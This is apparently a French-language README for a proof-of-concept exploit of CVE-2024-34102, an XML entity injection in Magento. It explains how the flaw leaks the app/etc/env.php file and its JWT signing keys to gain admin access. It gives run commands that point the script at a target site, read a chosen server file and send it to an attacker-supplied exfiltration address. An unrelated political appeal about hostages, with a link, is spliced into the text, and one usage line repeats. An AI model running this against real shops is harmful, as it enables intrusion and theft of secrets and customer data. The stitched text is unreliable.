
Preuve de concept d'exploitation pour CVE-2024-34102, une injection d'entités XML critique dans Magento, permettant l'exfiltration de fichiers sensibles et un accès administrateur non autorisé. À usage éducatif.
Nous exigeons le retour en toute sécurité de tous les citoyens pris en otage par le groupe terroriste Hamas. Nous ne nous reposerons pas tant que chaque otage ne sera pas libéré et ne rentrera pas chez lui sain et sauf. Vous pouvez aider à les ramener à la maison. https://stories.bringthemhomenow.net/
Ce dépôt contient une preuve de concept (PoC) pour l'exploitation de la vulnérabilité critique d'injection d'entités XML (CVE-2024-34102) dans Magento. Cette vulnérabilité permet l'exfiltration de fichiers sensibles, qui peuvent ensuite être utilisés pour obtenir un accès non autorisé aux fonctionnalités administratives de Magento. Cet exploit est conçu à des fins éducatives et doit être utilisé de manière responsable.
Magento est l'une des solutions de commerce électronique les plus populaires utilisées dans le monde. En juin 2024, un problème critique d'injection d'entités XML avant authentification a été découvert, identifié comme CVE-2024-34102. Cette vulnérabilité peut entraîner des conséquences graves, notamment l'exfiltration du fichier app/etc/env.php de Magento, qui contient les clés cryptographiques utilisées pour signer les JWT.
requests (pip install requests)Clonez le dépôt :
git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
cd CVE-2024-34102-exploit
Exécutez le script avec les arguments nécessaires :
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
--target-url : L'URL de l'instance Magento cible.--target-file : Le chemin du fichier sur le serveur cible à exfiltrer.--exfil-url : L'URL pour recevoir les données exfiltrées.python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999